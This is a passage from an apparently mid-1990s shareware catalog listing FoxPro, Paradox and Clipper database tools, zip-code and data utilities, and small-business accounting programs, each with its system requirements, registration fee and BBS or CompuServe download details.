phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; SHL.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 372k (about 28 minutes with a 2400 baud modem) + Description: + A Foxpro application that will allow the user to launch + selected and password protected Foxpro applications. Passwords + can be maintained by user or application. + + Chapter 5, "Database applications" 254 + + + + Product: Sub-contracor Billing + Author: , 616-281-3333 + Version: 2.2.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; JOB.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 429k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track sub- + contractor billing. Among its features is the ability to run + in a multi-user enviroment. It can access invoices by either + invoice number or client code. It can also record a single + check payment of multiple invoices. + + + Product: Version Control & Maintenance + Author: , 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; VCM.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 473k (about 35 minutes with a 2400 baud modem) + Description: + Lets either the client or the programmer maintain their + database of source code. As the client, it lets you obtain the + latest source code. As a programmer, it lets you maintain + another programmer's database of code. At the same time, other + programmers can keep up with your modifications. All without + the need to 'check-out' program files. + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 221. + + Chapter 5, "Database applications" 255 + + + + 5.6.4 For Paradox + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 234. + + Product: Report Utility for Paradox/DOS + Author: , 718-251-1891 + Version: 2.04 (02-12-94) + Needs: IBM PC, DOS 3.3 or better. 2048k RAM. Paradox for DOS + version 3.5-4.5. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: RPTUTL.ZIP on BBSs (call 718-241-0225 to download it at + no charge); RPTUTL.ZIP on CompuServe in CIS:PDOXDOS forum + LIBrary 13 (or contact userID 76670,2602 for assistance). + SWREG#: 2004 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Lets you move, copy and sumamrize fields and calculated fields + on a Paradox Report. This is a definite must for any users of + Paradox/Dos. It gives you the functionality Borland left out. + Considerably less expensive than other programs of its type. + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 221. + + Chapter 5, "Database applications" 256 + + + + 5.6.5 For Clipper + + Product: Builder + Author: , 612-730-4135 + Version: 2.2 (10-27-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of unlimited phone, CompuServe, mail support; royalty- + free source code; bonus utilities; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: availability unknown on BBSs. + PsL#: 11233 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A Clipper(tm) program source code generator. Create colorful + windowing text applications quickly and easily. Select from + several menu styles and window appearances. Automatic file + maintenance for primary and relation tables. Select from many + canned VALIDs. Memo field support. TBrowse and drop down + lists new to this version. Creates mouseable applications. + Report code generator also included. All your Clipper + programming needs in one package! + + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 249. + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 51. + + Product: Workbase + Dot-prompt utility for DBMS programmers. See full description + on page 250. + + Chapter 5, "Database applications" 257 + + + + 5.6.6 For other + + Product: Btr Watch + Author: , 202-675-4528 + Version: 1.0 (09-15-91) + Needs: IBM PC, DOS 3.1 or better. BTRIEVE.EXE or BREQUEST.EXE + and a Btrieve application. + Registration fee: $29.00 + Registration benefits: Latest version of Btr Watch / One year of + support / Bonus disk of other software to evaluate / $7 off + subscription to Shareware Magazine. + Look for: PROG. CORNER on BBSs (call 301-596-1180 to download it + at no charge); BWCH10.ZIP on CompuServe in CIS:NOVA forum + LIBrary 14 (or contact userID 74777,3004 for assistance). + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + This memory resident Btrieve debugger traces the interaction + between your application and Btrieve files. Monitors calls to + Btrieve and makes an entry into a log file every time a Btrieve + file is accessed. The time, date, file name, operation, + duration, and result of each access is recorded. Network- + compatible and can trace file accesses from multiple + workstations. Catches files that have been opened multiple + times without closing them. + + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 432. + + Product: SC-Scripter + Author: , 904-292-4770 + Version: 1.0 (08-27-94) + Needs: IBM 80386, DOS 3.3 or better. 200k RAM; Network (LAN). + NetLib for SQL Server from Microsoft/Sybase. + Registration fee: $39.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 5). 12-month free upgrading allowed. + Look for: availability unknown on BBSs; SCSCRP.ZIP on CompuServe + in CIS:SYBASE forum LIBrary 13 (or contact userID 73501,1261 + for assistance). + SWREG#: 3341 + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + A fast and easy SQL server management assistant that can + increase developer and database administrator productivity. It + will generate Transact-SQL scripts for entire databases or + individual objects. Its command line interface allows database + definitions to be generated as part of your complete backup + procedures. Can be a valuable tool in moving, restoring and + examining databases. + + Chapter 5, "Database applications" 258 + + + + 5.7 Other + + Product: TRAINING MANAGEMENT SYSTEM + Author: , 605-532-3479 + Version: 1.2 (04-15-94) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: Hard disk. + Registration fee: $30.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; site + license; bonus utilities; all ASP-wide offers (see page 5). 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; TMS12.EXE on CompuServe + in CIS:MILITARY forum LIBrary 14 (or contact userID 71533,344 + for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Designed for use by Army supervisors to track training. The + trainer enters go/no go data and dates and the program provides + reports that document training and assist in planning training. + It supports the Army Training Management System. Reports + produced include the Field Expedient Squad Book (DA Form + 5165-R). The Individual Soldier Report is a valuable aid in + performance counseling. The Training Evaluation Report shows + total stats for the group. + + Chapter 6, "Data" 259 + + + + + + Chapter 6 + Data + + + 6.1 Words + + Product: Curses! + Creative insult generator. See full description on page 608. + + 6.1.1 Names + + Product: HangWin + Hangman word game with sound. See full description on + page 629. + + + 6.2 Mapping data + + See also: Engineering, Surveying & cartography; Graphics, + Business applications, Mapping/cartography. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 508. + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 48. + + Product: VERSAMAP + Draws outline maps on 13 map projections. See full description + on page 509. + + + 6.3 Corporate data + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 364. + + + 6.4 Marketing data + + Product: CD-ROM Guide + Directory of DOS & Windows CD-ROM Titles. See full description + on page 520. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 125. + + Chapter 6, "Data" 260 + + + + 6.5 World facts + + Product: On This Day + "What happened on this day in history?" See full description + on page 474. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 475. + + Product: Wynter Stone's Quick Guide + Mini-encyclopedia of mystical information. See full + description on page 535. + + + 6.6 Zip codes + + Product: ZIPKEY + Author: , 812-339-1811 + Version: 2.04e (05-01-93) + Needs: IBM PC, DOS 2.0 or better. 22k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; bonus data. + Look for: ZK*.ZIP on BBSs (call 812-855-7252 to download it at no + charge); ZIPKEY.ZIP on CompuServe in CIS:ZIPKEY forum LIBrary + 14 (or contact userID 71333,3154 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1989 winner, Public Brand Software contests for useful + programs. + Description: + A complete city-level database of zip codes and telephone area + codes, combined with a keyboard enhancement program. Will pop + up over your text-mode application, look up a zip code, and + feed the results via keystrokes to your application. May be + configured to generate any sequence of keystrokes you wish. + Incredibly fast and compact. You can literally type a city, + state, zip code, and area code in seven keystrokes. + + Chapter 6, "Data" 261 + + + + Product: Zippidy Do Da(tm) [***] + Author: , 918-241-2301 + Version: 1.3 (02-27-95) + Needs: IBM 80386, Windows 3.1 or better. 3072k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Look for: ZDD130*.ZIP on BBSs (multiple files) (call 918-747-2542 + to download it at no charge); ZIPDODA.ZIP on CompuServe in + CIS:WINPROD forum LIBrary 14 (or contact userID 72644,2335 for + assistance). + SWREG#: 5625 + Download size: 1889k (about 140 minutes with a 2400 baud modem) + Description: + Searches by zip code, state, area code, city or the sound of + the city name. Very visual user interface with context + sensitive help. Supports reporting and custom reports via SQL + queries. Even shows the time at the selected city vs. your + local time. Very useful! + + + 6.7 Area codes + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 130. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 260. + + Product: Zippidy Do Da(tm) [***] + Zipcode/areacode lookup tool with time info. See full + description on page 260. + + + 6.8 Census data + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 508. + + + 6.9 Engineering data + + See also: Engineering. + + Chapter 6, "Data" 262 + + + + 6.9.1 For mechanical engineering + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 367. + + Product: PLOTTER + Data plotting and analysis program. See full description on + page 397. + + Product: Water and Steam Properties + Properties of ice, water and steam. See full description on + page 361. + + 6.9.2 For other + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 364. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 358. + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 367. + + Product: Periodic Table [***] + Electronic table of elements with decay data. See full + description on page 480. + + Product: WinDatCon + Windows data conversion program. See full description on + page 121. + + + 6.10 Quotes & anecdotes + + See also: Home & hobby, Quotes & anecdotes. + + Chapter 6, "Data" 263 + + + + Product: PC-Fortune + Author: , 416-751-5678 + Version: 2.20 (09-30-92) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $24.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus data; all ASP-wide offers + (see page 5). + Look for: PCF220.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 187k (about 14 minutes with a 2400 baud modem) + Description: + A "fortune cookie" program that selects and displays a fortune + at random from its data base of over 2,200 fortunes, quotes, + sayings, jokes, etc. A different item is selected each time + until all have been displayed, then it starts over. You may + also select items by number. Program can run from command line + or from AUTOEXEC.BAT. + + + 6.11 Encyclopedias + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 234. + + + 6.12 Software tools & add-ins + + 6.12.1 For multiple programs + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 439. + + Chapter 7, "Business" 264 + + + + + + Chapter 7 + Business + + See also: Spreadsheet applications; Database applications, + Mailing list systems; Data; Communications, Call logging & + analysis; Finances; Graphics, Business applications. + + + 7.1 Business finances + + See also: Finances, Personal finances. + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 353. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 566. + + Product: EXPRESSCALC + Powerful, easy-to-use. Great for home, office. See full + description on page 229. + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 342. + + Product: Financial Freedom + Complete finance management for Windows. See full description + on page 346. + + Product: Financial Freedom GOLD + Our high-end money management for Windows. See full + description on page 346. + + Product: Inventory Interface + Full featured inventory, MRP and POS package. See full + description on page 289. + + Chapter 7, "Business" 265 + + + + Product: PCLoan5 + Author: , 214-394-4087 + Version: 5.09 (09-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM. + Registration fee: $79.97 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A professional loan/mortgage/lease amortization system. + Supports all common methods of simple interest calculation + including daily interest, periodic interest, variable rates, + and negative amortization. + + All schedules are stored on disk and may be edited, + recalculated, viewed, or printed, repeatedly. Any loan term may + be changed at any time (even between payments). Non-scheduled + payments may be added and scheduled payments may be deleted. + + Calculator provides REG-Z APR, including points. + + + Product: WinCharging + Author: , 201-529-8318 + Version: 1.2 (08-10-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + WinCharging backup disk and protective carrying case. + Look for: WINCRG12.ZIP on BBSs; WINCRG.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + PsL#: 11734 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Ziff-Davis calls this "a sophisticated credit card management + system" and rated it a Four-Star program. It was also a + finalist in the 1995 Shareware Awards contest. If you want to + get the most out of your credit cards, or if you simply want to + be sure that what you pay for is really yours, this is the + program for you. It can track credit limits and target + amounts, print tax summaries, and much much more. + + Chapter 7, "Business" 266 + + + + 7.1.1 Business accounting + + Product: Bottom Line Accounting + Author: , 407-240-2300 + Version: 2.5E (02-04-94) + Needs: IBM 80386, DOS 4.0 or better. 2048k RAM; Hard disk. + Registration fee: $499.95 (add $7.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $33.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 1-month limited return policy; all ASP-wide offers (see + page 5); discounts on other products. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; BLA-?.EXE on CompuServe + in CIS:PCAPP forum LIBrary 5 (multiple files) (or contact + userID 75300,562 for assistance). + Download size: 5120k (about 380 minutes with a 2400 baud modem) + Description: + Easy to learn/use. No month-end closings required. Allows pre + and post-dated transactions. Unlimited transactions. On-the- + fly transactions/check writing. Allows errors to be easily + corrected. Context sensitive help screens. Complete reports & + graphs. Supports W-2's & 1099's. Paradox file structure. + Import/export/merge data files. Built-in backup. Drop-to-DOS + feature. Quick installation & setup. + + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 296. + + Product: CS/AMORT + Author: + Version: 2.10 (10-08-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive. + Registration fee: $24.50 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; all ASP-wide + offers (see page 5); discounts on upgrades. + Look for: CSAM21.ZIP on BBSs; CSAM21.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 5 (or contact userID 75047,3521 for + assistance). + Download size: 122k (about nine minutes with a 2400 baud modem) + Description: + Specifically designed to produce loan amortization schedules + for mortgage loans, as well as many types of commercial loans + (auto, personal, etc.). Contains many special features required + to produce proper amort schedules for various mortgage loans, + such as Fixed rate mortgages, graduated payment mortgages, + adjustable rate mortgages, bi-weekly mortgages and a number of + + Chapter 7, "Business" 267 + + + + others. Loan amortization calculations are based on the rules + published by FHA in the Federal Register. + + + Product: DAYO ACCOUNTS PAYABLE (AP) + Author: , 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOVE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOVE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your Payables. Its key mission is to process/post your purchase + orders, however, many other routines have been provided, ie: + expense maintenance, 1099 MISC forms, purchase clearing, vendor + maintenance, hand/manual checks, batch checks, recurring + checks, unlimited bank accounts, unlimited check printing + formats and many reports. + + + Product: DAYO ACCOUNTS RECEIVABLE (AR) + Author: , 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 268 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOAE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOAE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + The 'final chapter' to the processing and maintenance of all + your receivables. Includes routines to handle cash receipts, + customers, invoice types, terms, taxcodes, sales persons, and + more. Many reports are included (ie: Ageing, Customer, Sales... + ). There is a routine to print Statements (ie: SMART, 90, 60, + 30 days), and another one to create and print 'non' standard + invoices (not applicable to DAYO POS). HP laser forms are + provided as an option for statements and invoices. + + + Product: DAYO GENERAL LEDGER (GL) + Author: , 407-291-3960 + Version: 4.60+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOGE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOGE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Provides a means to manage and report company finances. Totally + integrated with the other DAYO packages. Features include + computer generated posting, multiuser, double entry, export + data, 30+ reports, budget management and unlimited accounts. + + Chapter 7, "Business" 269 + + + + Product: DAYO TIME & BILLING + Author: , 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOTE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOTE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + Comprises a system of creating invoices for services and/or + products. It has support for an inventory, receivables, + projects and customers/clients. Other features include: + multiuser, unlimited records, project notes, customer notes, + 30+ reports, onscreen viewing of reports, databases are dBase + (tm) compatible, laser formats for invoices and statements, 2 + styles of statements/bills, printer setup & drivers and cash + drawers drivers. + + + Product: EXPRESSCHECK + Menu driven checkbook manager. See full description on + page 349. + + Product: Fixed Asset Pro + Author: , 419-986-6007 + Version: 2.1 (07-15-95) + Needs: IBM PC, DOS 3.0 or better. 480k RAM; Hard disk. + Registration fee: $79.95 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 2-month return policy; discounts on other products. + Look for: availability unknown on BBSs; FAPRO.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 5 (multiple files) (or contact + userID 71540,3266 for assistance). + Download size: 475k (about 35 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A comprehensive fixed asset depreciation system. Using pull + down menus the program calculates depreciation on multiple + bases, applies tax limits, performs projections and + comparisons, and prints reports to screen, printer or file. + + Chapter 7, "Business" 270 + + + + Provides 38 U.S. tax law depreciation methods with online help. + Mouse support. Manual includes a tutorial. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 123. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 312. + + Product: Loan Master + Author: , 214-394-4087 + Version: 1.52.14 (10-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $495.00 (Canadian dollars) (add $3.00 (Canadian + dollars) for shipping to U.S. addresses) (add $10.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 2 months of phone, fax, + BBS, newsletter, mail support; all ASP-wide offers (see + page 5); discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs. + Download size: 700k (about 52 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A complete loan accounting and tracking system that maintains + and reports interest and late charges due. Prints trial + balances, past due, payments received, and loan transaction + statements. Prints past due and billing notices. Prints year + end statements. Maintains an optional escrow balance. Has + options to compute daily interest accruals or to track an + amortization schedule. + + + Product: OMS (Organizational Mgmt System + Management system for non-profit orgs. See full description on + page 321. + + Chapter 7, "Business" 271 + + + + Product: Paper Route Ledger + Author: , 317-782-9903 + Version: 1.47 (01-03-95) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $19.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; 1-month return policy; all ASP-wide offers (see + page 5). + Look for: PRL147.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PRL.ZIP on CompuServe in CIS:PCAPP forum LIBrary 5 + (or contact userID 73567,1547 for assistance). + SWREG#: 2446 + Download size: 312k (about 23 minutes with a 2400 baud modem) + Description: + Computerize and automate your paper route bookkeeping with this + unique program. Keeps track of customers, addresses, delivery + route order, route listing, collections, billings, tips, etc. + Print reports on your customer list, collections, route + listing, etc. Will handle multiple Delivery types (i.e. weekly, + weekdays only, weekends only, etc). Handles direct pay and + customers who pay through the newspaper offices. + + + Product: PC-AP + Author: , 707-255-4475 + Version: 1.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple accounts payable program integrated with PC-GL. + Allows you to quickly enter vendors, enter invoices, choose + invoice for payment and print checks. Reports include check + listing, invoice listing, vendor listing, vendor activity + report and mailing labels. Allows up to 2000 vendors and 2000 + invoices/checks per month. Invoices and checks may be sorted + by any field. Maintains check book balance and posts checks to + PC-GL each month. Can read payroll checks from our PC-PR. + + + Product: PC-AR + Accounts receivable. See full description on page 281. + + Chapter 7, "Business" 272 + + + + Product: PC-FOOD II FOOD COSTING + Professional food costing. See full description on page 310. + + Product: PC-GL + Author: , 707-255-4475 + Version: 3.8 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple general ledger program. It includes an easily + modified standard chart of accounts. The program prints an + income statement with current, year to date and prior year + percents and a three column balance sheet. Other reports + include a general ledger for current and year to date and a + number of different transaction listings. Each entry is + instantly verified. Allows up to 800 items in the chart of + accounts and up to 8000 transactions per month. + + + Product: PC-PR + Payroll writing. See full description on page 285. + + Product: PCINV + Author: , 707-255-4475 + Version: 1.3 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. + Look for: MEDLIN.ZIP on BBSs (call 707-257-2338 to download it at + no charge); MEDLIN.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 5 (or contact userID 71520,61 for assistance); MEDLIN.ZIP on + GEnie in IBMPC forum LIBrary 3. + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A fast, simple invoice writing program integrated with the PC- + AR program. Enter up to 50 lines of 42 character invoice + detail. Calculates sales tax on taxable items. Allows + multiple line descriptions which can include costs times + amount. Prints on 7" or 11" preprinted forms or plain paper. + Prints invoices as you enter them and does not allow for batch + printing or editing previous invoices. Invoices are immediately + posted to PC-AR. Handles multiple tax rates. + + Chapter 7, "Business" 273 + + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 345. + + Product: Rosewood Journal + Author: , 416-284-6119 + Version: 5.02 (09-21-93) + Needs: IBM PC, DOS 2.11 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; Hard + disk. + Registration fee: $38.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + return policy; royalty-free runtime license; all ASP-wide + offers (see page 5); disks of other shareware. + Look for: ROSEJ502.ZIP on BBSs; RJ502.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (or contact userID 70461,2507 for + assistance). + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + An invoice journal and complete accounts receivable package + written specifically for small to medium size businesses. + Allows easy entry of invoice data because of its intuitive + input and automatic account search. It will generate monthly + and yearly reports and aged accounts receivable lists and + statements ready for window envelopes. Up to 2 